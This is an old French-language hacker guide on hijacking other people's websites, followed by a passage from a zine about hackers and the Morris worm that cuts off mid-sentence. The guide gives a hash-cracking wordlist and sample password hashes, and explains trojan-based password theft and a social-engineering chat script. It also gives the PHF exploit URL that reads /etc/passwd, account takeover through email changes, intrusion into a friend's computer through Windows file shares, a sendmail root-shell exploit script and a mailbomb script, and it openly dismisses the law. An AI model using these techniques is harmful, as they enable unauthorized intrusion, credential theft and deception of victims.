-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ú - -ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ __ __ _ ____ ³ ³ \ \ / /__| |__ | _ \ __ _ __ _ ___ ³ ³ \ \ /\ / / _ \ '_ \| |_) / _` |/ _` |/ _ \ ³ ³ \ V V / __/ |_) | __/ (_| | (_| | __/ ³ ³ \_/\_/ \___|_.__/|_| \__,_|\__, |\___| ³ ³ |___/ ³ ³ _ _ _ _ ³ ³ | | | | __ _ ___| | _(_)_ __ __ _ ³ ³ | |_| |/ _` |/ __| |/ / | '_ \ / _` | ³ ³ | _ | (_| | (__| <| | | | | (_| | ³ ³ |_| |_|\__,_|\___|_|\_\_|_| |_|\__, | ³ ³ |___/ ³ ³ ³ ³ ³ ú - --ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅ-- __________________________________________________________________ / _____________________________________<-www.endrix.net->__________\ ||Site Web : Http://endrix.cjb.net ||____¯_¯_¯_¯_¯_¯_¯_¯____________\ ||Contact : lordendrix@hotmail.com ||______________________________|| ||mIRC : #pirate, #grc, #hack.fr, #phreak.fr, #outaouais, #n0past || \ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ / ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ============================================================ =========================par endrix========================= ============================================================ == == == == == The ultime guide to simple == == web page hacking == == == == Greeds to : == == ¯¯¯¯¯¯¯¯¯¯¯ == == _________ __________ __________ == == -[ _Franck ]- + -[ silicone ]- + -[ ASHMEU ]- == == -[ _SnoOp_ ]- + -[ B|aster ]- + -[ B3rT|9 ]- == == -[ B3rT|9 ]- + -[ H ]- + -[ surge-16 ]- == == ¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯ == == == ============================================================ ============================================================ ============================================================ O==============O <| Introduction |> O==============O Hey bien, voici a une édition par moi, endrix, sur le web page hacking. Après avoir lu ce texte, vous devriez être capable de modifier une page selon vous le désirez mais certaines conditions s'appliquent. Je n'ai pas écrit ca pour que tout le monde commence a hacker tout le monde. C'est juste pour vous montrez que vous pouvez faire que chose cool avec peu de connaissance dans le piratage car ceci va vous permettre un hacker une page web avec presque pas de commaissance. Pour me rejoindre, vous pouvez m'envoyer un email à lordendrix@hotmail.com ou sur mIRC, sur les channels suivants : #outaouais, #warezfrancais, #hack.fr, #haqch, #grc, #pirate et #visualbasic. Je vous conseille fortement d'aller visiter mon site web à l'addresse suivante : Http://endrix.cjb.net. Si vous possédez un domaine(.com, .net ou .org) et le serveur est sur un T1 minimum et vous voullez me hoster, hey bien contacter moi le plus vite possible !!! Have fun !!! O=================O <| Matière de base |> O=================O Premièrement, il faut savoir quelque matière de base avant faire tout ca. "je veux hacker mais je ne sais pas comment utiliser un ftp" --> ichhhh !! Je recois souvent un message de ce genre. Ici, je vais vous apprendre comment utiliser un ftp, mais si vous êtez un internet wizzard, skipper cette section au plus sacran !!! Bon, pour mettre un site sur l'internet, il faut un serveur qui est connecté 24h sur 24h sur l'internet et qui offre un service de web hosting comme : - Geocities => Http://www.geocities.com - Multimania => Http://www.multimania.com - Fortunecity => Http://www.fortunecity.com - ml services => Http://www.ml.org - Xoom.com => Http://www.xoom.com - Angelfire => Http://www.angelfire.com - Altern => Http://www.altern.org - come => Http://www.come.to - et bien d'autres.... Ces serveurs offres un service de web hosting gratuit qui permet et personne comme vous et moi de ce faire un super site web et attirer plein de gens du monde entier !! Après que votre page web est fait(index.html) il faut l'uploader(*) sur le serveur. * = Uploader c'est envoyez un fichier de votre ordinateur. downloader c'est aller chercher un fichier d'un ordinateur au votre. il y a 2 moyens de faire ca : WWW upload(d'un site web) et FTP. C'est pas tout les serveurs qui offrent le www upload mais un comme geocities l'offre. Je vous conseille malgré cela, de toujours le faire par FTP. il y a plusieurs ftp sur le marché du web mais je vous suggère d'utiliser le plus connu : CuteFTP. Il est facile a utiliser et très complet. Allez le cherchez à http://www.tucows.com et pour l'enregistrer, emailer moi... Donc, une fois installé cuteftp, connectez-vous a votre serveur. Si vous êtes a xoom, dans le host marquez : ftp.xoom.com, votre nom d'usager et le mot de passe. Une fois connecté, vous pouvez envoyer tout vos fichiers sur le net sans difficulté. Maintenant, vous savez comment utiliser un FTP. Pour hacker un site web, il vous faut le nom de l'host, le nom de l'utilisateur et le mot de passe. Le seul qui est dur a obtenir est le mot de passe(password). Pour avoir le host, si la page est www.xoom.com/z3r0c00l/index.html, le host est xoom.com et le username est z3r0c00l mais comment le host si c'est... worldhacking.com ??!?! Pour faire ca, il vous faut ouvrir votre mode ms-dos. Démarrer, Exécuter et écrire "command" et clicker sur "Enter". Une fenêtre va apparaitre(MS-DOS) : ------ Microsoft(R) Windows 98 (C)Copyright Microsoft Corp 1981-1998. C:\WIN98\Bureau> ------ Il faut être dans le c:\win98>. Alors tapez c:\win98\bureau>cd.. ------ c:\win98> ------ La, il fait ouvrir un programme qui l'appelle Telnet. Ce programme est utilisez pour faire plusieur choses.. chatter, vérifiez ces emails, uploader sont site web, .... Faites ca : ------ c:\win98>telnet whois.internic.net 23 ------ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ceci va ouvrir le programme Telnet et va marquer ca(c'est normal que parfois ca prenne quelque temps..) : ------ UNIX(r) System V Release 4.0 (rrs4) *************************************************************************** * -- InterNIC Registration Services Center -- * * For the *original* whois type: WHOIS [search string] * For referral whois type: RWHOIS [search string] * * For user assistance call (703) 742-4777 # Questions/Updates on the whois database to HOSTMASTER@internic.net * Please report system problems to ACTION@internic.net *************************************************************************** The InterNIC Registration Services database contains ONLY non-military and non-US Government Domains and contacts. Other associated whois servers: American Registry for Internet Numbers - whois.arin.net European IP Address Allocations - whois.ripe.net Asia Pacific IP Address Allocations - whois.apnic.net US Military - whois.nic.mil US Government - whois.nic.gov Cmdinter Ver 1.3 Mon Jan 18 23:22:59 1999 EST [dec-vt100] InterNIC > ------- what tha ???? La, vous êtes conencté a un serveur whois.internic.net qui vous permets d'obtenir de l'information sur n'importe koi .. faites ceci : ----- [dec-vt100] InterNIC >whois worldhacking.com ----- et ca va donner quelque chose comme ca : ----- Registrant: alexmax gaublay (WORLDHACKING-DOM) 154 rue des champselyses chicoutimi, NA g7h3g3 CA Domain Name: WORLDHACKING.COM Domain Status: On Hold Administrative Contact: albert, fredo (FA1544) pennyboy@MYGALE.ORG 545-2426 (FAX) 645-3532 Technical Contact, Zone Contact: Lacambre, Valentin (VL15) root@ALTERN.COM 33 1 40264666 Billing Contact: albert, fredo (FA1544) pennyboy@MYGALE.ORG 545-2426 (FAX) 645-3532 Record last updated on 12-Jan-99. Record created on 21-Oct-98. Database last updated on 16-Jan-99 04:09:41 EST. Domain servers in listed order: NS1.MERDRE.NET 209.66.99.99 NS2.MERDRE.NET 209.207.174.20 Whois: ----- d'après ce qu'a donné ca, le domain worldhacking.com est hosté par le serveur MERDRE.NET, merdre.net est un domaine de altern.org. Donc, voila qu'on connait le host de worldhacking.com qui est ftp.altern.org !!! et le username qui est worldhacking bien sur !!! Mais maintenant, comment trouver le password ??? heehe le fameux fichier que tout le monde aimerais avoir !!! Et bien, j'ai trouvé plusieurs moyen de se procurer ce fichier : - par un trojan - S.E. - www password cracker - PHF - Changement d'email - Partage de fichier - Exploit de linux par un trou de sécurité ====================== = Les fichiers PWL = ====================== Quand vous allez cracker des fichiers mot de passe, il vous faut les connaitre. Un fichier mot de passe est normalement comme ceci : Administrator:500:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904 Ceci est un fichier password d'un administrateur de domaine. Tout les chiffres que vous voyez, sont le password encrypté. Pour le décrypter, il faut un programme. Le meilleur que je connaisse est John the Ripper et/ou LOphtCrack. Ces programmes sont ultra rapide pour faire ce genre de chose pour cracker, il faut un password et une word list... Une word list a l'air de quelque chose comme ca : 0 1 7 123 246 249 369 777 911 1022 1225 1234 1313 1928 1951 2112 2222 4444 5252 5555 5683 6969 7007 7777 12345 13579 14430 54321 80486 90210 92072 111111 121212 123123 123456 131313 654321 666666 696969 888888 1234567 8675309 12345678 21122112 99999999 !@#$% !@#$%^ !@#$%^& !@#$%^&* * @#$%^& _ 10sne1 1234qwer 123abc 123go 1701d 1a2b3c 1p2o3i 1q2w3e 1qw23e 1sanjose 2welcome 4runner a A&M A&P a12345 a1b2c3 a1b2c3d4 AAA aaa aaaaaa Aaaaaa AAAS aardvark Aarhus Aaron aaron AAU ABA Ababa aback abacus abalone abandon abase abash abate abater abbas abbe abbey abbot Abbott abbreviate abby abc abc abc123 ABC123 abcd abcd1234 abcde Abcdef abcdef Abcdefg abcdefg abdicate abdomen abdominal abduct Abe abed Abel Abelian Abelson Aberdeen Abernathy aberrant aberrate abet abetted abetting abeyance abeyant abhor abhorred abhorrent abide Abidjan Abigail abigail abject abjure ablate ablaze able ablution abnegation Abner abnormal Abo aboard abode abolish abolition abominable abominate aboriginal aborigine aborning abort abound about above aboveboard aboveground abovementioned abrade Abraham Abram Abramson abrasion abrasive abreact abreast abridge abridgment abroad abrogate abrupt abscess abscissa abscissae abscond absence absent absentee absenteeism absentia absentminded absinthe absolut absolute absolution absolve absorb absorbent absorption absorptive abstain abstention abstinent abstract abstracter abstractor abstruse absurd absurdum abuilding abundant abusable abuse abusive abut abutted abutting abysmal abyss Abyssinia AC acacia academe academia academic academician academy Acadia acanthus Acapulco accede accelerate accelerometer accent accentual Voici une minuscule word list. Essayez de cracker celui-ci. Vous devriez trouver le password "A" pour l'administrateur. En voici d'autre pour vous : foura:1002:DCF9CAA6DBC2F2DFAAD3B435B51404EE:FA5664875FFADF0AF61ABF9B097FA46F::: fivea:1003:A80F6E6A87BA6AC2AAD3B435B51404EE:75C06256F58D07A18B239E4CC39A382D::: sixa:1004:A9C604D244C4E99DAAD3B435B51404EE:ACB98FD0478427CD18949050C5E87B47::: sevena:1005:CBC501A4D2227783AAD3B435B51404EE:20C3AE5D1C643871B2CA618C2512CC46::: eighta:1006:CBC501A4D22277837584248B8D2C9F9E:291E34A0D1EEB75F9ECB0880B469BE23::: onez:1007:1D91A081D4B37861AAD3B435B51404EE:0366F5C43990657D4AF37BC470E0EF97::: twoz:1008:E1C862B468D1C6D6AAD3B435B51404EE:A2EBDCC6F325AB2B343020497301F66C::: threez:1009:CF78D4607D48813AAAD3B435B51404EE:CC12D60632E2BEBE925F20970B6C1EE8::: fourz:1010:CE045FF77F9D89E2AAD3B435B51404EE:5029F63209F0A33B7BAACF85F1984DB3::: fivez:1011:9A0A242740E1E245AAD3B435B51404EE:974EEB9F2ED704D87E8EB392EEA688ED::: sixz:1012:1FB363FEB834C12DAAD3B435B51404EE:FCE5DF542D589B2B55E2A8EA8290C8B6::: sevenz:1013:A5E6066DE61C3E35AAD3B435B51404EE:BFA802E2F36CDF2B776B7A85FD5ED863::: eightz:1014:A5E6066DE61C3E351D91A081D4B37861:F05C1449BA2575D9764EC7F9DE4F8040::: ninez:1015:A5E6066DE61C3E35E1C862B468D1C6D6:F08E2A5987D4692D9A8B32CF409DB874::: onem:1016:1486235A2333E4D2AAD3B435B51404EE:7E864D8195B263B4D6AEE4E041C0193F::: twom:1017:FBF69FCD34281A77AAD3B435B51404EE:094930B371F21E4A8379CC6ACF23B05E::: threem:1018:8F3E3862EBBCCC49AAD3B435B51404EE:C1E809475B2D41C4EA883A249EE4D203::: fourm:1019:4983AA449F48595CAAD3B435B51404EE:313FCB69CF31E3EDA1CA2C94B79B33A2::: fivem:1020:D5C546473739D83AAAD3B435B51404EE:A918E0700CE78341A188774DD66DC7A4::: sixm:1021:81A28589262A0004AAD3B435B51404EE:FF4EF4C1DD99FFC59D982E40522FF474::: sevenm:1022:F6F2FA9986D540CFAAD3B435B51404EE:9FACF535A07FC4B778D9879B49EA004D::: eightm:1023:F6F2FA9986D540CF1486235A2333E4D2:60B0D2BA29482C9AE3E07A4617176E51::: ninem:1024:F6F2FA9986D540CFFBF69FCD34281A77:8B64AA9FDDE6B8C7F246E20845797545::: Essayez de les crackers .... Pour les passwords, emailer moi et je vais vous dire si c'est correct ou pas. =================== = Par un Trojan = =================== Pour faire ca, il vous faut, un IPscanner et un client de trojan, les suivants feront l'affaire : - Socket de Troie - NetBUS - DeepBO - Hacker's paradise - Portal of Doom - Millenium - N'importe quel trojan qui donne un access au disque dur. PortScanner : Ce programme va servir à scanner un IP(xxx.xxx.xxx.1 à xxx.xxx.xxx.255) et trouver des personnes qui sont infecté par un trojan. Port : - 5000 (socket de troie) - 31337 (BackOrifice) - 31338 (DeepBO) - 12345 (Netbus v1.6) - 123456 (netbus v1.7) Avec des trojans, il y a deux maniere que j'ai trouvé. Avec un trojan et permet de voir les cached passwords(DeepBO) ou avec un qui donne accèss au HD(Disque dur). DeepBO est un trojan, qui quand tu es connecté, il permet de te montrer les passwords que la personne a dans sont registery(base de registre). il y a des serveurs comme geocities qui envoit un cookie dans ton reg ou certains FTP font ca aussi... Et quand, avec deepbo, tu vas avoir trouvé une personne qui est infecté et a une page web avec geocities... quand tu vas faire voir les cached passwords, ca va te donner les passwords et les usernames ... tu peux aussi infecté le web master d'un site web si tu veux en fesant du se .... Avec netbus ?!? Et bien, cette maniere va marcher avec n'importe quel trojan qui permet d'avoir access au HD de l'utilisateur du PC. Si la personne a CuteFTP, dans sont répertoire, il y a un fichier qui se nomme smdata.dat Ce fichier contient les informations des ftp que la personne a mit dans sont bookmark. Tu peux voir le user name, le host mais le password est encrypté. Voici la clé de décryption pour CuteFTP : a = © b = ª c = « d = ¬ e = ­ f = ¾ g = ¯ h = i = ¡ j = ¢ k = £ l = ¤ m = ¥ n = ¦ o = § p = ¸ q = ¹ r = º s = » t = ¼ u = ½  v = ¾ w = ¿ x = ° y = ± z = ² ou bien, vous avez juste a télécharger le fichier smdata.dat et le remplacer par celui que vous avez en ce moment dans cotre CuteFTP a vous. Maintenant, vous avez juste a ouvrir votre cuteftp et vous connecté au ftp du mec et modifier ca page web a votre guise ... ======================= = Social Eingineering = ======================= Le Social Eingineering est une facon de convaincre la personne, le web master, le mec qui travaille la.... de vous faire confiance et de vous donnez des informations très importante qui vons vous permettre d'accomplir votre but avec succès !! Si vous voullez le fichier smdata.dat vous avez juste a faire un petit scénario comme celui-ci : Hey man ca va ??? ouaip pi toi ? pas mal merci ...... euhhmm.. j'ai grandement besoin d'aide ... as-tu CuteFTP ??? oui pourquoi ???? il faut que j'update mon site au plustot mais ma soeur ou mon pere ont du touché a l'ordinateur, car quand j'ouvre mon cuteftp ca marque qu'il manque un fichier .. meneute m'a aller voir c'est koi encore .... ok ... c'est le fichier "smdata.dat" .... tu dois l'avoir ???? euuuuuuu... oui je crois ... si oui, je vais te l'envoyez ... DCC send = smdata.dat si tu étais a côté de moi, je te donnerait un gros bec !!! merci, merci beaucoup !!! np tiens, t'ira voir mon travail dans 20 minutes à : http://www.domaine.com merci encore, je dois y aller !! ok bye !! heehe ceci est une technique de SE. Vous aussi enfaire un pour envoyer un virus a un mec et faire accroire que c'est un super programme .... Je vous laisse avec votre imagination sur ce point ... ======================== = www password cracker = ======================== un WWW password cracker, est un programme, qui avec une bonne word list(*), trouve le mot de passe. * word list : Une word list, est un fichier texte qui contient que des mots .... Ce que le programme fait : Il se connecte sur le FTP du mec, avec le username et le host et essaye de ce connecter avec chaque mot qu'il y a dans le word list comme password. Je sais, ca peut être très long car, il y a des word lists, et contiennent comme 10000 mots... mais il s'agit de trouvé une bonne word list et ca risque de marcher a tout coup !!! Voici quelque programme qui font ca : - Unsecure - WebCrack - WWWHack (pour les pass en HTML) - Nessus - VcrackFTP ==================== = Technique du PHF = ==================== Bien cette technique, a été il y a très longtemp découvert mais il y a encore 5% des serveurs qui n'on pas changer leurs programmes et qui sont vulnérable. Cette maniere, est une des plus faciles qu'il y a !!! Encore plus facile qu'avec les trojans. Pour obtenir le fichier password, il s'agit de faire ca : Http://www.domaine.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd et voila !! c'est tout !!! Vous n'avez qu'a remplacer le domaine.com par le site que vous voullez hacké. ====================== = Changement d'email = ====================== Dans tout les serveurs qui offrent du web hosting gratuit, pour vous inscrire, vous devez entrer vos coordonées, le nom d'utilisateur et le mot de passe. Pour activer votre compte, il faut aller voir vos emails et avec votre password, activé le compte. Donc, pour commencer il vous faut avoir un email qui est presque pareille que le web master du site. Après, allez sur le site de votre web hosting, aller dans aide et faitez un changement d'adresse email. Quand ceci va être fais, demander pour vous envoyez le mot de passe a votre nouveau car, vous l'avez perdu et, blah, blah, blah ... Quand vous allez checker vos emails, vous allez voir un message du servuer vous donnant le mot de passe du site ! :)))) ====================== = Partage de fichier = ====================== Hey bien, quand vous allez chez vos amis(es) avec votre ordinateur, et vous vous mettez en réseaux, vous jouez a des jeux comme, Starcraft, Quake, Doom, Duke 3D, Blood.... Mais après quand vous avez finnit, vous allez mettre le HD de votre ami en partage de fichier(qui te donne accèss au HD de ton chu) et tu vas chercher des fichiers cool, des jeux, ou meme des logs de mIRC ... Après avoir fait tout ca, vous partez, mais doooooohh !!! Tu as oublier de copier des fichiers...GRRRrrrrrrr !!!! Tu peux pas lui demander parce que tu n'es pas supposé avec ces fichiers... alors quand il va être sur le Net, tu vas le voir tu dit salut, blah, blah ... Tu prends sont IP(/dns nick). Premièrement, il faut vérifier s'il l'a auté.. comment !!!!???? Ouvrez une fenêtre dos(Démarrer, Executé tappez command et peser sur enter). -------- Microsoft(R) Windows 98 (C)Copyright Microsoft Corp 1981-1998. C:\WIN98\Bureau> -------- bon, allez dans votre répertoire de windows, c:\win98\bureau>cd.. c:\win98> La, on va utiliser une commande qui permet de voir si la personne est encore en partage de fichier... -------- c:\win98>nbtstat -A IP NetBIOS Remote Machine Name Table Name Type Status ----------------------------------------------------- UNSERNAME <00> UNIQUE Registered WORKGROUP <00> GROUP Registered USERNAME <03> UNIQUE Registered USERNAME <20> UNIQUE Registered WORKGROUP <1E> GROUP Registered MAC Address = 44-45-53-54-00-00 c:\win98> -------- Si vous voyez ca, ca veux dire que ton ami est encore en partage de fichier. Avant de l'appeller pour lui dire, il faut que tu ailles chercher tes fichiers.... S'il n'est pas en partage de fichier, vous verez un message d'erreur. Dans le fond, ce qui nous interresse, c'est le <20>, qui est le service de partage. S'il n'est pas la, vous ne pourrez jamais, au grand jamais, vous connecter à cet ordinateur. La, il faut que vous tappiez la commande suivante : -------- c:\win98>echo IP_du_remote_20 > c:\win98\lmhosts -------- Ceci va crée le fichier lmhosts avec tout les choses dedant pour faire fonctionner le hack. Si le lmhosts n'est pas la, ou est mal écrit, rien de vais marcher. Et voila, il ne vous reste qu'à rester le cache du netbios en tappant la command suivante : ------- c:\win98>nbtstat -R Successful purge and preload of the NBT Remote Cache Name Table. c:\win98> ------- Maintenant, pour voir les drives qui sont en partage, vous pouvez faire ceci : ------- c:\win98>net view \\nom_remote_20 Shared resources at \\USERNAME Sharename Type Comment ----------------------------------------------- A Disk C Disk D Disk The command was completed successfully c:\win98> ------- Bon, apres avoir fait ca, vous pouvez voir quel drives vous avez accèss. D'apres celui-ci, le A, le C, le D sont en partage donc, vour pouvez avoir accèss au A, C et D. Pour vous connecter, faites ceci : ------- c:\win98>net use * \nom_du_remote_20 le_drive ------- Donc, si le nom_du_remote_20 est : endrix et le drive est : c Faites : c:\win98>net use * \endrix c Et bien la, vous êtes connecté sur l'ordinateur du mec. Maintenant vous pouvez allez chercher vos fichiers et l'appeller pour lui dire de ne plus laissez sont HD en partage. ===================== = Exploit de Linux = ===================== Hey bien pour cette section je ne vais que montrer un exploit très cunnu qui a comme fonction de faire un bug dans le système et vous donnez le r00t du Pc. Cet exploit de nomme : SendMail v8.8.4 il crée un programme dans le /tmp/x qui donne le root apres ... SendMail : ¯¯¯¯¯¯¯¯ cat <<_EOF_>/tmp/x.c #define RUN "/bin/ksh" #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat <<_EOF_>/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat <<_EOF_>/tmp/smtpd.c main() { setuid(0);setgid(0); system("shown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O3 -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP '/usr/ucb/ps -ax|grep /tmp/smpd|grep -v grep|sed s/"[]*"//cut -d" "-fl' rm /tmp/spawnfish.c /tmp/spawnfish /tmpsmtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi En voici un autre : #!/bin/bash TMPDIR=/tmp/`whoami` PLIK=$TMPDIR/.safe TIMEOUT=2 LIMIT=10 MAX=20 echo echo "SafeBomb 1.02b -- sendmail HELO hole usage example" echo "Author: Michal Zalewski " echo if [ "$4" = "" ]; then echo "USAGE: $0 msgfile address server sender" echo echo " msgfile - file to send as a message body" echo " address - address of lucky recipient" echo " server - outgoing smtp server w/sendmail" echo " sender - introduce yourself" echo echo "WARNING: For educational use ONLY. Mailbombing is illegal." echo "Think twice BEFORE you use this program in any way. Also," echo "I've never said this program is 100% safe nor bug-free." echo sleep 1 exit 0 fi if [ ! -f $1 ]; then echo "Message file not found." echo exit 0 fi echo -n "Preparing message..." mkdir $TMPDIR &>/dev/null chmod 700 $TMPDIR echo "echo \"helo _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__ safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__ safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom bb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__ safebomb__safebomb__safebomb_\"" >$PLIK echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK echo "echo \"rcpt to: $2\"" >>$PLIK echo "echo \"data\"" >>$PLIK echo "cat <<__qniec__" >>$PLIK cat $1 >>$PLIK echo "__qniec__" >>$PLIK echo "echo \".\"" >>$PLIK echo "echo \"quit\"" >>$PLIK echo "sleep $TIMEOUT" >>$PLIK chmod +x $PLIK echo "OK" echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort." SENT=0 while [ -f $1 ]; do $PLIK|telnet $3 25 &>/dev/null & let SENT=SENT+1 echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b" CONNECTED=`ps|grep -c "telnet $3"` if [ "$LIMIT" -le "$CONNECTED" ]; then while [ "$LIMIT" -le "$CONNECTED" ]; do sleep 1 done fi if [ "$SENT" -ge "$MAX" ]; then echo "It's just an example, sorry." echo exit 0 fi done hey bien, je vous souhaite ben du fun les boys and girls avec ces exploits !!! O============O <| conclusion |> O============O voila, c'est finnit !!!! Avec ca, vous allez pouvoir vous faire ben du fun... N'oublier que d'entrer sur un ordinateur qui n'est pas le notre est un infraction a la loi(who gives a fuck...). Faites vous pas pogner et si vous avez d'autre maniere que je n'ai pas penssé, faites moi le savoir !!! ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1 : #Quebec can't join channel (it's full) , un classique quoi. | Plus maintenant grace a /timer 0 3 /join #quebec | Une fois entrer sur le chan,tapper | /timer1 off | Pour ceux qui avaient pas pensé a ce truc '.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __ Qui sont-ils ? Par [G]r4FX Pirates. Le terme de pirate englobe toutes les personnes qui enfreignent les lois de l'informatique. Ces lois sont établies par chaque pays, cela pose un problème car Internet est accessible à tous les habitants de la planète et certains actes sont des infractions pour les uns mais pas obligatoirement pour les autres. (Informatique et Liberté). Le pirate est une personne qui viole les droits d'autrui ou des sociétés à son profit. Les pirates les plus communs sont les hackers, les crackers et toute personne copiant du software pour son utilisation personnelle ou pour la vente. Nous laisserons de côté la copie de software, pour nous intéresser de plus près à ceux qui veulent prendre le contrôle d'un système informatique alors qu'ils n'y sont pas autorisés. Hackers. Le hacker est une personne qui rentre dans un système informatique en sautant les barrières de protection (Le roi des hackers), souvent par défi intellectuel et pas toujours par profit matériel. Certains ne font que visiter le système causant, malgré tout, la panique des services de sécurité. D'autres hackers appelés parfois crackers sont beaucoup plus actifs; ils pénètrent un système et en détériorent le software en le modifiant, en le détruisant, en lui implantant un virus, etc. Un exemple simple de " cracking " pourrait être celui de changer un lien (" link ") par une autre sans en changer le nom. C'est à dire une personne qui voudrait rentrer pour connaître les offres d'une banque serait renvoyée sur un autre site. Les hackers sont-ils dangereux? Outre le fait qu'une attaque de hackers peut endommager ou détruire votre software, hackers ou crackers peuvent aussi violer l'intimité de n'importe quel citoyen. Beaucoup de personnes ont dans leur ordinateur ou dans celui de leur entreprise une grande partie de leur vie personnelle : accès aux comptes en banque, courrier électronique qu'il soit personnel ou professionnel, etc...Une attaque de hackers peut donc se traduire par une destruction de ces données ou pire par une utilisation frauduleuse et à votre insu de celles-ci. Comment procèdent-ils? Certains pirates réussissent à rentrer dans un réseau en utilisant un code d'entrée ( mot de passe ). Ils essaient, d'abord, de se renseigner sur le nombre de caractères possibles dans le code. Ensuite, ils tentent, par l'intermédiaire d'un programme de leur fabrication, tous les codes possibles par rapport au nombre de caractères obtenus auparavant et ce jusqu'au succès. Une autre méthode est la suivante: les pirates recherchent des informations personnelles sur le propriétaire du système qu'ils veulent visiter. Les statistiques démontrent que la plupart des personnes prennent leurs données personnelles comme code d'entrée dans leur ordinateur. (nom de leurs enfants, date de naissance, etc...). Alors, les hackers essayent différentes combinaisons avec ces données. Il n'est bien entendu pas possible de recenser toutes les méthodes, l'imagination des hackers est sans bornes. Exemples De la Une du New York Times aux journaux télévisés diffusées aux heures de grande écoute, tous les médias ont retenu du 3 novembre 1988 l'arrivée d'un virus qui a paralysé pendant plusieurs jours la quasi totalité des centres de calcul universitaires et de recherche des Etats-Unis. L'auteur Robert Tappan Morris a été condamné par le tribunal de Syracuse USA à 400 heures de " service communautaire ", à trois ans de surveillance judiciaire et à 10 000 dollars d'amende. C'est la diffusion fulgurante du virus qui constitue la caractéristique la plus étonnante de l'action du " ver " de Robert T. Morris. Les premiers signes de l'épidémie sont apparus presque simultanément sur les côtes Est et Ouest. A une demi-heure d'intervalle, le Massachusetts Institute of Technology ( MIT ) et la Rand Corporation se trouvaient infectés, le 2 novembre 1988 vers dix-huit heures. Le lendemain, des centaines de Vax, des stations Sun ainsi que d'autre machines fonctionnant sous Unix étaient elles aussi touchées. Les opérateurs relevaient des temps de réponse fortement dégradés, leurs machines étant surchargées de travail par l'exécution simultanée d'une multitude de tâches qui renaissaient spontanément en dépit des efforts visant à les éliminer. Pire, une machine arrêtée puis redémarrée se trouvait instantanément contaminée. En tout cas, l'importance du fuck up provoquée par Robert T. Morris en ce " jeudi noir " a démontré que, contrairement à ce que l'ont pense, les minis et moyens systèmes fonctionnant sous Unix ne sont pas plus à l'abri des "épidémies informatiques " que les micro-ordinateurs. Internet, le réseau attaqué, relie entre elles toutes les universités américaines et des milliers de sites. Son premier rôle reste l'acheminement du courrier électronique des enseignants, des chercheurs et même des étudiants, ce qui représente une population de plusieurs millions d'usagers. Le même réseau autorise le transfert de fichiers et l'ouvertures de sessions " console " sur des machines distantes. Sitôt l'attaque détectée, les meilleurs chercheurs d'outre-Atlantique se sont empressés de la combattre. Il leur a fallu deux jours pour démontrer le mécanisme du ver. Un programme composé d'une centaine de lignes de C couplé à deux fichiers " objet " (l'un propre aux serveurs Vax et l'autre aux stations Sun) constituaient le vecteur d'infection. Aussitôt entré dans un calculateur, le " Morris worm " établissait la liste des autres machines connectées au même noeud du réseau et consacrait alors toutes les ressources de la machine nouvellement conquise à la contamination des autres postes. Un des processus de l'attaque consistait en une routine de craquage des " mots de passe " (Comment font-ils?), remarquable pour sa vitesse. C'est à cette tâche que le ver dépensait la plus grande partie du temps de travail des machines colonisées. Pour se défendre, le ver maintenait son propre code sous forme crypté (cryptage). Et pour décourager les tentatives visant à le désassembler, il changeait régulièrement de numéro de processus se rendant plus difficile à déceler. Malgré tout, l'infection restait somme toute bénigne puisqu'elle ne détruisait aucune donnée. Pour mémoire, notons que le père de l'étudiant facétieux compte parmi les plus grands experts américains de la sécurité informatique. Nul doute 